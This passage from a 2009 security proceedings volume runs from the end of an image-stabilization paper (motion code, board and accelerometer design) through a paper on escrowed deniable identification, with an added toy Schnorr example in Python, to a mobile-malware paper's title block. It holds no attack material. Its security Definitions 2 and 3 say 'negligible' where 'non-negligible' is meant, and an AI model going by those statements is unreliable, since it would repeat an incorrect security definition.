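def global_motion(prev_img, cur_img, centers, prev_global, planes=(4,), N=3, S=3):
    """Global motion vector: median of the regional vectors together with the
    previous global vector. planes=(4,) is the single-plane algorithm of
    Section 2.2; two planes follow the enhancement of Section 2.3."""
    prev_planes = [bit_plane(prev_img, k) for k in planes]
    cur_planes = [bit_plane(cur_img, k) for k in planes]
    vecs = [local_motion(prev_planes, cur_planes, cx, cy, N, S) for cx, cy in centers]
    vecs.append(prev_global)
    return (int(median(v[0] for v in vecs)), int(median(v[1] for v in vecs)))


def compensate(img, gx, gy):
    """Motion compensation: shift the frame by the global vector, reversed."""
    return shift_frame(img, -gx, -gy)


# Centres of the four regions (assumed positions), as in four-region estimation.
CENTERS = [(10, 10), (21, 10), (10, 21), (21, 21)]


def demo(dx=2, dy=-1, planes=(4,)):
    """Shake a constructed frame by (dx, dy), estimate the shake and undo it.
    Returns the estimated global vector and whether compensation restored the frame."""
    prev = make_texture()
    cur = shift_frame(prev, dx, dy)
    gx, gy = global_motion(prev, cur, CENTERS, (0, 0), planes)
    return (gx, gy), compensate(cur, gx, gy) == prev


if __name__ == "__main__":
    print(demo())  # -> ((2, -1), True)
```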
3 Hardware Design

The algorithms mentioned in the previous chapter can be easily implemented on a common PC. Our goal, however, is to design a standalone solution for image stabilization, which has to fulfill defined specifications. The result of our efforts should be a device able to stabilize an input video stream and to send the stabilized stream to an output. The specifications that must be fulfilled are defined as follows:
• Size of the final board must not exceed 100×120 mm.
• Height of the final product must be lower than or equal to 12 mm.
Fig. 3. Proposed design of the board for the image stabilization [5] (blocks: Video input, Video output, Interface, DSP unit 1 with FPGA unit 1 and SDRAM 1, DSP unit 2 with FPGA unit 2 and SDRAM 2, Microcontroller, Flash, SD card)
• The board should contain four layers not exceeding a total width of 1.5 mm.
• The final product must be able to operate under military conditions, e.g. an operating temperature range from -40 °C to 85 °C.

3.1 Description of Our Hardware Layout
The board consists of input/output connectors, persistent storage units, processing units, a microcontroller, and a video processing unit. The connectors serve simply for video input and output. The persistent storage is in the form of a FLASH memory containing the software, which is booted after a reset of the board. There is a slot for an SD card too, which enables the user to upgrade the software: a new version of the software is uploaded to the FLASH memory automatically when an SD card is present in the slot. The microcontroller provides the means of communication between the individual components (FLASH memory – SD card, FLASH memory – FPGA etc.). The video processing unit consists of an encoder and a decoder that encode/decode the video stream. The main part of the board is the processing unit. For this task we decided to use a combination of an FPGA and a digital signal processor (FPGA-DSP combination) as the engine of the board. Since the board must allow for future upgrades, it contains an independent pair of FPGA-DSP combinations (see Figure 3) working in parallel. Each FPGA-DSP combination has its own memory bank to avoid memory stalls and shared memory issues. This way there is one FPGA-DSP pair for the image stabilization and the other FPGA-DSP pair for future upgrades (e.g. for object tracking). Each module can operate separately, is independent (even though they can use each other’s results), and can be omitted from the final design, which makes the board very flexible. The first processing unit serves the purposes of the image stabilization. It can read frames from the input video stream, store them in its memory and process them. The resulting frames can be sent to the output video stream. The second processing unit doesn’t need to be included on the board. When it is present on the board, however, it can communicate directly with the first module. It can read frames of the
input video stream and send them to the output video stream too. When both units are functional and working, the output stream is produced by the second unit. Each module can be turned off so that each stage of the video stream processing can be easily bypassed (it can be useful in some cases to see the unprocessed input video stream). This solution is a compromise between the hardware specifications, the given constraints and the algorithm requirements. The combination of an FPGA and a DSP allows us to distribute the tasks given by the algorithm between both the processor and the gate array. Hence, the FPGA can perform some general operations (preliminary steps of the algorithm), whereas the DSP can focus on the calculations (e.g. Fast Fourier Transform).

3.2 Solution with an Accelerometer
When a camera is placed on a stable holder and the height of this holder is too big, the camera will be subject to motion caused by e.g. wind, asperity of the road, and waves on the sea. Motion of the camera is both rotational and linear. Rotational motion can be measured using a gyroscope, linear motion using an accelerometer. When the camera holder is not so big, rotational motion of the camera is the dominant form of camera movement. However, as the height of the camera holder increases, linear motion becomes the dominant form of camera motion. Because we assume high camera holders, we decided to use MEMS accelerometers for motion detection. Micro-Electro-Mechanical Systems (MEMS) is the integration of mechanical elements, sensors, actuators, and electronics on a common silicon substrate. MEMS accelerometers and gyroscopes are emerging at a very fast pace in consumer electronics products. Since 1998, MEMS gyroscopes have been widely integrated into camcorders to provide optical stabilization features. In 2003, MEMS accelerometers entered consumer applications in large volume as a protection feature for hard disk drives. We have done some experiments with this accelerometer, placed on a mast (7 m long) – see Figure 4.
Fig. 4. Experiments with accelerometer (acquired during fine shaking of camera)
We have a built-in MEMS accelerometer on our hardware board. We use an accelerometer from STMicroelectronics with the following characteristics [6]:
• Acceleration range: ±6 g
• Bandwidth: 640 Hz
• Temperature range: -40 °C to +85 °C
• Interface: I2C or SPI
• Supply voltage: 2.5 V
Using this accelerometer we are able to measure movements of the whole camera system in all three directions, and therefore we know the actual deviation from the balanced state. The stabilization algorithm receives the respective acceleration data from each of the accelerometer axes and also knows a mechanical model of the camera holder. The algorithm then uses the data from the mechanical model of the holder and the acceleration data to produce a motion vector to correct the image captured by a camera that is in motion. For the computation we use the approximation of the measured values over a time interval of 1 s. The curve is smoothed and we take only the deviation of this average value from the balanced state, which gives additional information to our algorithm for image stabilization. This information is combined with the values from the software to obtain the resulting value needed for the image movement.
4 Conclusion

We have a standalone unit with two DSP processors ready to realize digital image stabilization. One backup DSP-FPGA pair is ready for future use, e.g. for the task of object tracking. At the moment, three parallel ways for the image stabilization algorithm are used. We try to use common algorithms for this task, but with our optimizations and improvements to ensure strong robustness. The future work is to load the optimized parallelized program onto the hardware unit. Testing and further optimizations, especially in parallelism, will be performed soon. Of course, further improvements will be needed, e.g. for different regions of usage (e.g. arctic ice regions, windy areas etc.). In the future, we want to try to implement the image stabilization on another DSP platform which does not use fixed point as our contemporary solution does.

Acknowledgments. This research has been done under the support of the grant “Security-Oriented Research in Information Technology”, MSM0021630528 (CZ) and the industrial company EVPU Defence s.r.o.
References
1. Brooks, A.C.: Real-Time Digital Image Stabilization, EE 420 Image Processing Computer Project Final Paper, p. 10. EED Northwestern University, USA (March 2003)
2. Sachs, D., Nasiri, S., Goehl, D.: Image Stabilization Technology Overview, p. 18. InvenSense Inc., USA (2007)
3. Ko, S.J., Lee, S.H., Jeon, S.W.: Fast Digital Image Stabilizer Based on Gray-Coded Bit-Plane Matching, pp. 90–91. IEEE, USA (1999)
4. Vella, F., Castorina, A., Mancuso, M., Messina, G.: Robust Digital Image Stabilization Algorithm Using Block Motion Vectors, pp. 234–235. IEEE, USA (2002)
5. Drahansky, M., Orsag, F.: Digital Image Stabilization in a Video-Stream. In: Proceedings of VISAPP 2009, Lisboa, PT, INSTICC, pp. 621–625 (2009) ISBN 978-989-8111-74-6
6. Web page of STMicroelectronics, http://www.st.com/
Escrowed Deniable Identification Schemes

Pairat Thorncharoensri¹, Qiong Huang², Willy Susilo¹, Man Ho Au¹, Yi Mu¹, and Duncan Wong²

¹ School of Computer Science & Software Engineering, University of Wollongong, Australia
{pt78,wsusilo,mhaa456,ymu}@uow.edu.au
² Department of Computer Science, City University of Hong Kong, Hong Kong
[email protected], [email protected]
Abstract. Generally, the goal of identification schemes is to provide security assurance against impersonation attacks. Identification schemes based on zero-knowledge protocols have additional advantages, for example deniability, which enables the prover to deny an identification proof, so that the verifier cannot convince others that it was indeed the prover who identified itself to him. However, in some applications the existence of a (trusted) party able to find evidence that a party did identify itself to a verifier is required, in order to prevent parties from misbehaving. So in this case ‘undeniability’ is needed. To the best of our knowledge, an identification scheme that provides both deniability and undeniability does not exist in the literature. In this work we propose the notion of escrowed deniable identification schemes, which integrates both the ‘escrowed deniability’ (undeniability) and ‘deniability’ properties.
1 Introduction

Since the seminal introduction of zero-knowledge proofs by Goldwasser, Micali and Rackoff, many interactive identification schemes based on zero-knowledge proofs have been proposed. In the following, we borrow the politician example given in [4] and extend it. Politicians would like to enter a building equipped with a smart card identification system. A politician acts as a prover and the smart card reader acts as a verifier. In order to prevent the identities of politicians who entered the building from being revealed to paparazzi by the smart card verification system, deniable identification is needed in this case. Now imagine that at some time an emergency occurs in the building, and its administrator needs to find out who entered the building during a certain time interval. If we still use deniable identification, an identification transcript does not necessarily prove that a politician did enter the building during that time interval. Hence, a new variant of identification schemes, which we call ‘escrowed deniable identification’, is required. In this primitive, there is a (trusted) party who is able to produce evidence proving that a prover has participated in the generation of the identification transcript, and furthermore, the verifier cannot do so without the help of the trusted party.

Our Contributions

To the best of our knowledge, there is no identification scheme which integrates both deniability and undeniability. In this work we first propose the notion of ‘escrowed deniable
This work is partially supported by ARC Linkage Project Grant LP0667899.
D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 234–241, 2009. © Springer-Verlag Berlin Heidelberg 2009
identification schemes’, which protects the identity of the prover from being revealed to the public by the verifier and, in the meanwhile, endows a (trusted) party with the ability to reveal the prover’s identity from an identification transcript non-interactively, thus restraining provers from misbehavior.

Paper Organization

In the next section we review some number-theoretic assumptions which will be used in our construction. We provide the definition of an escrowed deniable identification scheme in Sec. 3. The formal models of the security properties of an escrowed deniable identification scheme are also given there. In Sec. 4 we propose our efficient construction of an escrowed deniable identification scheme and analyze its security. Section 5 concludes the paper.
2 Preliminaries

Basic Concepts on Bilinear Pairings and Complexity Assumptions. Let $G_1$ and $G_2$ be cyclic multiplicative groups generated by $g_1$ and $g_2$ respectively. The order of both generators is a prime $p$. Let $G_T$ be a cyclic multiplicative group with the same order $p$. We say that $\hat{e} : G_1 \times G_2 \to G_T$ is an admissible bilinear pairing if the following hold. First, Bilinearity: $\hat{e}(g_1^a, g_2^b) = \hat{e}(g_1, g_2)^{ab}$ for all $g_1 \in G_1$, $g_2 \in G_2$, $a, b \in \mathbb{Z}_p$. Second, Non-degeneracy: there exist $g_1 \in G_1$ and $g_2 \in G_2$ such that $\hat{e}(g_1, g_2) \neq 1$. Last, Computability: there exists an efficient algorithm to compute $\hat{e}(g_1, g_2)$ for all $g_1 \in G_1$, $g_2 \in G_2$.
3 Escrowed Deniable Identification

In this section, we provide a formal model of an escrowed deniable identification scheme and its security model.

3.1 Escrowed Deniable Identification Schemes

We introduce a notion called escrowed deniable identification scheme (EDID) that balances both the need for deniability and the need for undeniability in identification schemes. Formally, an EDID scheme involves a prover P, a verifier V, a trusted authority TA, and any third party V′. It consists of the following algorithms and protocols:

Setup: On input 1^k, where k is the security parameter, the algorithm generates a system parameter, i.e. param ← Setup(1^k).

KeyGenT: On input param, it generates a public/secret key pair (pkT, skT) for the trusted authority, i.e. (pkT, skT) ← KeyGenT(param).

KeyGenP: On input param, it generates a public/secret key pair (pkP, skP) for the prover, i.e. (pkP, skP) ← KeyGenP(param).

Identification protocol (P, V): This is an interactive protocol between the prover P and the verifier V. It consists of four rounds of communication and six PPT algorithms, (CmtV, CmtP, Ch, Rsp, CheckP, CheckV). (CmtP, CheckP) and (CheckV,
CmtV) are sets of algorithms to generate commitments and to verify the commitments, run by the prover P and the verifier V, respectively. Ch is an algorithm to disclose the challenge and Rsp is an algorithm run by the prover P to generate the response. The protocol runs as follows:

Step 1. V chooses a challenge c at random from a certain domain and computes T ← CmtV(c). V then sends T to P.
Step 2. P chooses r at random from a certain domain and computes a ← CmtP(r). P then sends a to V.
Step 3. V runs Ch to reveal the random challenge c, and sends it to P.
Step 4. After receiving V’s challenge c, P runs b ← CheckP(c, T). If b = 0, P aborts; otherwise, it computes its response by running z ← Rsp(skP, r, c), and sends z to V.
Step 5. V checks the validity of P’s response by running CheckV(pkT, pkP, a, c, z). If the output is ‘1’, V accepts; otherwise, it rejects.

Open protocol (TA, V): An open protocol can be formalized by two (probabilistic) polynomial-time algorithms (Open, Verf), where Open is invoked by TA and Verf is executed by the verifier V. On input a transcript tr and the secret key of TA, Open outputs an evidence to affirm the authenticity of tr. Verf is an algorithm for validating the evidence with respect to tr and pkP. It takes as input pkT, pkP, tr and the evidence, and outputs 1 for accepting or 0 for rejecting the evidence.

Transfer protocol (V, V′): A transfer protocol is an interactive protocol between the verifier V, who possesses a transcript tr and its affirmative evidence from the trusted authority (TA), and any third party V′. The aim of the protocol is to convince V′ that tr indeed represents an execution of the identification protocol between P and V.

3.2 Deniability

Roughly speaking, deniability indicates that given a transcript of an execution of the identification protocol, the prover is able to deny that he is the prover in the execution.
To achieve deniability, we require that the verifier itself could generate this transcript. Formally, we consider the following definition, which shares a similarity with that of zero knowledge.

Definition 1 (Deniability). An escrowed deniable identification scheme EDID is deniable if for any param ← Setup(1^k), (pkT, skT) ← KeyGenT(param) and (pkP, skP) ← KeyGenP(param), for any PPT algorithm D and for any verifier strategy V*, there exists a PPT algorithm S which has oracle access to V*, such that |Pr[Expt1(k) = 1] − Pr[Expt2(k) = 1]| is negligible in k, where Expt1(k) and Expt2(k) are defined as follows:

Expt1(k):
  tr ← ⟨P(skP), V*(pkT, pkP)⟩
  b ← D(pkT, pkP, tr)
  return b

Expt2(k):
  tr ← S^{V*}(pkT, pkP)
  b ← D(pkT, pkP, tr)
  return b

where the probabilities are taken over the random bits used in Setup, KeyGenT, KeyGenP, and the random bits consumed by P, V*, S and D.
Escrowed Deniable Identification Schemes
237
3.3 Impersonation

Security against impersonation means that no one except the prover P with its public key pkP can identify itself to others as P. In this work we consider impersonation under active attacks. An imp-aa adversary A is a pair of PPT algorithms (A1, A2), where A1 acts as V* and A2 acts as P*. Let st denote the state information. The active attack is initialized by first calling Setup, KeyGenT and KeyGenP to generate the public/secret key pairs (pkT, skT) and (pkP, skP) for the trusted authority and the prover respectively. Taking the public keys pkT and pkP as input, the adversary A then performs its attack in the following two phases:

Phase 1. (Learning Phase) Given input pkT, pkP, A1 is allowed to interact with P's clones sequentially. When each of P's clones interacts with A1, it is initialized with (pkP, skP), pkT and fresh random coins. Later, A1 outputs st to be passed on to A2.

Phase 2. (Impersonation Phase) V is initialized with pkT, pkP, while the adversary A2 is given st. Then A2 tries to impersonate P to V. At last, V outputs a decision bit b, indicating accept or reject.

The adversary A is said to be successful in the attack if V outputs 1 at the end of Phase 2. Formally, we consider the following experiment:

$$\begin{array}{l}
\mathrm{Expt}^{imp\text{-}aa}_{A}(k): \\
\quad param \leftarrow \mathrm{Setup}(1^k) \\
\quad (pk_T, sk_T) \leftarrow \mathrm{KeyGen}_T(param) \\
\quad (pk_P, sk_P) \leftarrow \mathrm{KeyGen}_P(param) \\
\quad (\bot, st) \leftarrow A_1^{P(sk_P)}(pk_T, sk_T, pk_P) \\
\quad (\bot, b) \leftarrow \langle A_2(sk_T, st), V(pk_T, pk_P)\rangle \\
\quad \text{return } b
\end{array}$$

where an oracle call to P(skP) results in an execution of the identification protocol with the prover P, and a transcript tr is returned.

Definition 2 (Security against Impersonation under Active Attack). We say an escrowed deniable identification scheme EDID is secure against impersonation under active attack if there is no PPT adversary A = (A1, A2) such that the probability Pr[Expt^{imp-aa}_A(k) = 1] is negligible in k. Note that in the definition above the adversary can be the trusted authority.
That is, even the TA cannot impersonate the prover in an active attack.

3.4 Transferability

Intuitively, the notion of transferability in escrowed deniable identification schemes aims to reveal the transcript confirmation, or evidence, that proves the validity of the prover of the transcript. In the experiment below, the adversary is modeled as a malicious verifier who tries to convince any third party to accept the transcript without the help of the trusted authority. Hence, the trusted authority is viewed as an opening oracle O_EDID_Open who answers queries for opening the chosen transcript. We provide a formal definition of transferability as follows. Let V* be any verifier strategy (honest or malicious). Let tr ← ⟨P(sk), V*(pk)⟩ be the transcript of an interaction between P and V*, and let σ ← ⟨TA(skTA), V*(pk)⟩ be the confirmation evidence σ of an interaction between TA and V*. Let Verf be the verifier's decision algorithm which takes a transcript tr and its confirmation evidence σ as inputs and outputs 1 or 0, indicating 'accept' or 'reject', respectively. Let S be a probabilistic polynomial-time algorithm. We consider the following experiment:

$$\begin{array}{l}
\mathrm{Expt}^{tran}_{A}(k): \\
\quad (pk, pk_T, sk, sk_T) \leftarrow \mathrm{KeyGen}(1^k) \\
\quad (\bot, st) \leftarrow A_1^{O_{EDID_{ID}},\, O_{EDID_{Open}}}(pk, pk_T) \\
\quad (tr^*, \sigma^*) \leftarrow A_2(st) \\
\quad \text{If } (tr^*, \sigma^*) \text{ has been queried to } O_{EDID_{ID}}, O_{EDID_{Open}} \text{ then } \bot, \\
\quad \text{otherwise, in the transfer protocol (or any other protocol for transferring the proof } (tr^*, \sigma^*)\text{):} \\
\quad\quad (\bot, b) \leftarrow \langle A_2(tr^*, \sigma^*), \mathrm{AnyV}(pk, pk_T)\rangle \\
\quad \text{Return } b
\end{array}$$

Adversary A is said to be successful in the attack if AnyV outputs b = accept.

Definition 3 (Security against Transferability Attack). An identification scheme ID = (KeyGen, P, V) is said to be secure against transferability attack if there is no probabilistic polynomial-time adversary A = (A1, A2) such that the probability Pr[Expt^{tran}_A(k) = 1] is negligible in k.

$$\begin{array}{l|l|l}
\text{Oracle } O_{EDID_{ID}}: & \text{Oracle } O_{EDID_{Open}}(tr): & \text{Oracle } O_H(str): \\
\quad tr = (a, b, z) \leftarrow \langle O_{EDID_{ID}}(sk_P), V(pk_T, pk_P)\rangle & \quad \sigma \leftarrow \mathrm{Open}(sk_T, pk_T, tr) & \quad m \leftarrow H(str) \\
\quad \text{Return } tr & \quad b \leftarrow \mathrm{Verf}(tr, \sigma, pk_T) & \quad \text{Return } m \\
 & \quad \text{Return } \sigma \text{ iff } b = \text{accept} & \\
 & \quad \text{Otherwise, return } \bot &
\end{array}$$

Fig. 1. Oracles for an adversary attacking the transferability of an escrowed deniable identification scheme
4 Our Construction

In this section, we present our scheme based on the idea outlined above. The construction uses the Boneh-Boyen short signature scheme and the verifiable encryption scheme due to Boneh et al. [1,2]. We incorporate the technique in [3] to construct our EDID scheme in the standard model. The scheme works as follows.

1. Setup: Let $(G_1, G_T)$ be two multiplicative cyclic groups where $|G_1| = |G_T| = p$ for some large prime p. $g, g_1$ and $g_2$ are generators of $G_1$ and $\hat e : G_1 \times G_1 \to G_T$ is a bilinear pairing. Let $H : \{0,1\}^* \to \mathbb{Z}_p^*$ be a collision-resistant hash function. The system parameter param then consists of $(G_1, G_T, \hat e, p, g, g_1, g_2, H)$.

2. KeyGenT: Given the public parameter param, KeyGenT selects random numbers $x, y \in \mathbb{Z}_p$ and $W \in G_1$ and computes $V = W^y$, $U = V^x$. The public key and private key of the trusted authority are $pk_T = (U, V, W)$ and $sk_T = (x, y)$ respectively.
3. KeyGenP: Given the public parameter param, KeyGenP selects a random number $s \in \mathbb{Z}_p$ and computes $S_P = g_1^s$. The public key and private key of the prover are $pk_P = S_P$ and $sk_P = s$ respectively.

4. Identification protocol: The protocol comprises two parts. The first part is a 4-round zero-knowledge proof protocol of the Schnorr identification, in which the prover P proves to the verifier V that he knows the secret key s, the discrete logarithm of the public key $S_P$ to base $g_1$. In the second part of the identification protocol, the prover P generates a BB04 short signature σ on the 4-round Schnorr identification transcript he just carried out with the verifier. P then computes $\hat\sigma$, the verifiable encryption of σ under the TA's public key, and sends it to the verifier. Finally, P proves to the verifier, in an interactive manner, that $\hat\sigma$ is correctly formed. Following the description above, the protocol would take more than four rounds. The round efficiency of the protocol can be optimized by setting σ to be the signature on the first two rounds of the 4-round Schnorr identification protocol and conducting the proof of correctness of $\hat\sigma$ in parallel with the Schnorr identification with the verifier. The resulting protocol remains four rounds and is shown as follows.

(a) 1st Round (V to P). (Commitment of Challenge.) V randomly generates $c, d \xleftarrow{\$} \mathbb{Z}_p^*$, computes $T = g_1^c g_2^d$ and sends T to P.

(b) 2nd Round (P to V). First, P randomly generates $r_s \xleftarrow{\$} \mathbb{Z}_p^*$ and computes $T_1 = g_1^{r_s}$. Now, P runs the KeyGen of the BB04 signature for the one-time public key $pk_{OT}$ and the one-time secret key $sk_{OT}$. However, P can simply use some common parameters from param, such as p and $\hat e$, for the BB04 signature. Hence, on input param, P randomly selects $g_a, g_b \in G_1$ and $\alpha, \eta \in \mathbb{Z}_p$ and computes the one-time public key $pk_{OT} = (g_a, g_b, U = g_b^{\alpha}, V = g_b^{\eta}, Z = \hat e(g_a, g_b))$ and the one-time secret key $sk_{OT} = (\alpha, \eta)$. Second, P randomly selects $a, b \xleftarrow{\$} \mathbb{Z}_p^*$ and computes $E_1 = U^a$ and $E_2 = V^b$. Then P randomly generates $r_a, r_b \xleftarrow{\$} \mathbb{Z}_p^*$ and computes $A_1 = U^{r_a}$ and $A_2 = V^{r_b}$. Let $m = H(pk_{OT})$. Third, P computes a signature $\sigma = g^{1/(s+m)}$. Then P computes $E_3 = \sigma W^{a+b}$ and $A_3 = \hat e(W, S_P g_1^m)^{r_a + r_b}$. Parse $\hat A$ as $(A_1, A_2, A_3)$ and $\hat E$ as $(E_1, E_2, E_3)$. Let $\bar m = H(T, T_1, pk_P, E_1, E_2, E_3, A_1, A_2, A_3)$. At last, on input $pk_{OT}, sk_{OT}$, P randomly chooses $\kappa \xleftarrow{\$} \mathbb{Z}_p^*$ and computes $\bar\sigma = g_a^{1/(\alpha + \kappa\cdot\eta + \bar m)}$. Then P sends $(T_1, pk_{OT}, \bar\sigma, \kappa, \hat E, \hat A)$ to V.

(c) 3rd Round (V to P). (Challenge.) V sends c, d to P.

(d) 4th Round (P to V). (Response.) P checks whether $T \stackrel{?}{=} g_1^c g_2^d$ and outputs ⊥ if the check fails. Otherwise P computes $z_s = r_s - cs$, $z_a = r_a - ca$ and $z_b = r_b - cb$, sets $\hat Z = (z_s, z_a, z_b)$ and sends $\hat Z$ to V.

(e) (Verification.) V computes $\bar m = H(T, T_1, pk_P, E_1, E_2, E_3, A_1, A_2, A_3)$ and $m = H(pk_{OT})$ and outputs accept if all of the following hold:

$$T_1 \stackrel{?}{=} S_P^{c} g_1^{z_s},\quad \hat e(g_a, g_b) \stackrel{?}{=} \hat e(\bar\sigma, U \cdot V^{\kappa} \cdot g_2^{\bar m}),\quad A_1 \stackrel{?}{=} E_1^{c} U^{z_a},\quad A_2 \stackrel{?}{=} E_2^{c} V^{z_b},\quad A_3 \stackrel{?}{=} \left(\frac{\hat e(E_3, S_P g_1^m)}{\hat e(g, g_1)}\right)^{c} \hat e(W, S_P g_1^m)^{z_a + z_b}.$$

Output reject otherwise.

Fig. 2. Open & Transfer Protocols

Open protocol (between V and TA):

V → TA: $tr = (T, T_1, pk_{OT}, \bar\sigma, \kappa, \hat A, \hat E, c, d, \hat Z)$.

TA: $\bar m \leftarrow H(T, T_1, pk_P, E_1, E_2, E_3, A_1, A_2, A_3)$; $m \leftarrow H(pk_{OT})$.
If not $\big(T_1 = S_P^{c} g_1^{z_s} \;\wedge\; \hat e(g_a, g_b) = \hat e(\bar\sigma, U \cdot V^{\kappa} \cdot g_2^{\bar m}) \;\wedge\; A_1 = E_1^{c} U^{z_a} \;\wedge\; A_2 = E_2^{c} V^{z_b} \;\wedge\; A_3 = \big(\hat e(E_3, S_P g_1^m)/\hat e(g, g_1)\big)^{c}\, \hat e(W, S_P g_1^m)^{z_a + z_b}\big)$ then ⊥.
Otherwise, $\sigma \leftarrow E_3 / (E_1^{1/xy} E_2^{1/x})$; if $\hat e(g, g_1) = \hat e(\sigma, S_P g_1^m)$ then $\mathrm{Open}(sk_{TA}) \stackrel{def}{=} \sigma$, else ⊥.

TA → V: σ.

V (Verf): if $\hat e(g, g_1) = \hat e(\sigma, S_P g_1^m)$ then Verf = accept, else Verf = reject.

Transfer protocol (between V and any third party):

Third party → V: $c', d' \xleftarrow{\$} \mathbb{Z}_p^*$; $T' = g_1^{c'} g_2^{d'}$; send $T'$.

V → third party: $a', r_a' \xleftarrow{\$} \mathbb{Z}_p^*$; $D_1 \leftarrow \sigma g_2^{a'}$; $D_2 \leftarrow \hat e(g_2, S_P g_1^m)^{r_a'}$; $\mathrm{Cmt}(pk_P, tr, r_a', a') \stackrel{def}{=} (D_1, D_2)$; send $tr, D_1, D_2$.

Third party → V: $\mathrm{Ch} \stackrel{def}{=} (c', d')$.

V → third party: if $T' = g_1^{c'} g_2^{d'}$ then $z' \leftarrow r_a' + c' a'$ and $\mathrm{Rsp}(pk_P, sk_P, \mathrm{Cmt}, \mathrm{Ch}) \stackrel{def}{=} z'$, else ⊥; send $z'$.

Third party (Check): $\bar m \leftarrow H(T, T_1, pk_P, E_1, E_2, E_3, A_1, A_2, A_3)$ and $m \leftarrow H(pk_{OT})$. If
$$\left(\frac{\hat e(D_1, S_P g_1^m)}{\hat e(g, g_1)}\right)^{c'} \stackrel{?}{=} D_2^{-1}\, \hat e(g_2, S_P g_1^m)^{z'} \;\wedge\; \hat e(g_a, g_b) \stackrel{?}{=} \hat e(\bar\sigma, U \cdot V^{\kappa} \cdot g_2^{\bar m}),$$
then the transcript tr was generated by P.

5. Open protocol: The protocol can be denoted by OP = (Open, Verf), where Open and Verf are PPT algorithms used in the protocol detailed in Figure 2.

6. Transfer protocol: The protocol can be denoted by TP = (Cmt, Ch, Rsp, Check), where Cmt, Ch, Rsp and Check are PPT algorithms used in the following protocol,
where the verifier V proves to any third party verifier that a transcript denoted as tr was indeed generated by P. This protocol is illustrated in Figure 2.

Theorem 1. The identification protocol in our identification scheme EDID is deniable.

Theorem 2. The transfer protocol in our identification scheme EDID = (Setup, KeyGen, P, V, TA, AnyV) is a zero-knowledge protocol.

Theorem 3. Our identification scheme EDID is secure against impersonation under active attacks in the standard model, if the q-DL assumption holds.

Theorem 4. Our identification scheme EDID = (Setup, KeyGen, P, V, TA, AnyV) is secure against transferability attack in the standard model if the q-SDH problem holds.

Due to the page limitation, please find the proofs of Theorems 1, 2, 3 and 4 in the full version of this paper [5].
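The Schnorr part of the identification protocol (rounds (a) to (d) and the first check of step (e)) together with the verifier-side simulation behind Theorem 1, as an added example in Python that is not the paper's code. The group parameters (p = 2039, q = 1019, g1 = 4, g2 = 9) are constructed toy values chosen here, not from the paper; the BB04 signature and the verifiable encryption, which need a pairing, are left out.

```python
"""Added example (not the paper's code): the 4-round Schnorr identification
with a committed challenge, as used in Section 4 of the EDID scheme, over a
toy prime-order group.

Constructed parameters (my assumption, not the paper's): p = 2039 is a safe
prime, q = 1019 is the order of its quadratic-residue subgroup, and g1 = 4,
g2 = 9 generate that subgroup.  A real deployment needs a cryptographic group
size and a g2 whose discrete logarithm to base g1 is unknown to everyone.
"""
import secrets

P = 2039   # toy safe prime
Q = 1019   # (P - 1) // 2, prime order of the subgroup; exponents live in Z_Q
G1 = 4     # generator of the order-Q subgroup
G2 = 9     # second generator used only in the challenge commitment T


def rand_exp():
    """Random non-zero exponent (the paper draws c, d, r_s from Z_p^*)."""
    return 1 + secrets.randbelow(Q - 1)


def keygen_p():
    """KeyGen_P: secret s, public key S_P = g1^s.  Returns (pk, sk)."""
    s = rand_exp()
    return pow(G1, s, P), s


def commit_challenge(c, d):
    """Round (a): T = g1^c * g2^d binds V to its challenge before seeing T1."""
    return pow(G1, c, P) * pow(G2, d, P) % P


def verify(pk_p, tr):
    """Schnorr conditions of step (e): T opens to (c, d) and T1 == S_P^c g1^{z_s}."""
    t, t1, c, d, zs = tr
    if t != commit_challenge(c, d):
        return False
    return t1 == pow(pk_p, c, P) * pow(G1, zs, P) % P


def run_identification(pk_p, sk_p):
    """Honest execution of rounds (a)-(d); returns tr = (T, T1, c, d, z_s)."""
    # (a) V picks c, d and sends the commitment T.
    c, d = rand_exp(), rand_exp()
    t = commit_challenge(c, d)
    # (b) P commits with fresh randomness r_s: T1 = g1^{r_s}.
    rs = rand_exp()
    t1 = pow(G1, rs, P)
    # (c) V opens (c, d).  (d) P checks the opening, then answers
    # z_s = r_s - c*s (mod Q); with a bad opening P outputs bottom.
    if t != commit_challenge(c, d):
        raise ValueError("challenge opening does not match T")
    zs = (rs - c * sk_p) % Q
    return (t, t1, c, d, zs)


def simulate_transcript(pk_p):
    """Deniability (Definition 1, Theorem 1): a verifier alone builds an
    accepting transcript.  It knows c and d, so it picks z_s first and
    solves T1 = S_P^c g1^{z_s}; the transcript is indistinguishable from a
    real one and therefore proves nothing to a third party without the TA."""
    c, d = rand_exp(), rand_exp()
    t = commit_challenge(c, d)
    zs = rand_exp()
    t1 = pow(pk_p, c, P) * pow(G1, zs, P) % P
    return (t, t1, c, d, zs)
```

Running the honest protocol with a wrong secret, or altering z_s in a real transcript, fails `verify`, while `simulate_transcript` passes it; that gap between "accepted by V" and "provable to others" is exactly what the escrowed Open and Transfer protocols fill.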
5 Conclusion We introduced a new notion called escrowed deniability in an identification scheme. This notion bridges the gap between deniability and non-deniability in the identification scheme. We have also provided a concrete scheme that satisfies this new notion. The security of our identification scheme provides for both impersonation and transferability (escrowed deniability). In short, we believe the escrowed deniability property is an essential feature for identification schemes where the need for incorporation and disaffirmation is crucial.
References

1. Boneh, D., Boyen, X.: Short signatures without random oracles. In: Cachin, C., Camenisch, J.L. (eds.) EUROCRYPT 2004. LNCS, vol. 3027, pp. 56–73. Springer, Heidelberg (2004)
2. Boneh, D., Gentry, C., Lynn, B., Shacham, H.: Aggregate and verifiably encrypted signatures from bilinear maps. In: Biham, E. (ed.) EUROCRYPT 2003. LNCS, vol. 2656, pp. 416–432. Springer, Heidelberg (2003)
3. Huang, Q., Wong, D.S., Li, J., Zhao, Y.: Generic transformation from weakly to strongly unforgeable signatures. J. Comput. Sci. Technol. 23(2), 240–252 (2008)
4. Thorncharoensri, P., Huang, Q., Au, M.H., Susilo, W., Yang, G., Mu, Y., Wong, D.S.: The need for deniability in identification schemes. In: Short Presentation Track in 9th International Workshop on Information Security Applications, WISA 2008 (September 2008)
5. Thorncharoensri, P., Huang, Q., Susilo, W., Au, M.H., Mu, Y., Wong, D.: Escrowed deniable identification schemes (full version). Can be obtained from the first author (2009)
Insights into Malware Detection and Prevention on Mobile Phones

Qiang Yan¹, Yingjiu Li¹, Tieyan Li², and Robert Deng¹

¹ School of Information Systems, Singapore Management University
² Institute for Infocomm Research, A*STAR, Singapore
{qiang.yan.2008,yjli,robertdeng}@smu.edu.sg, [email protected]
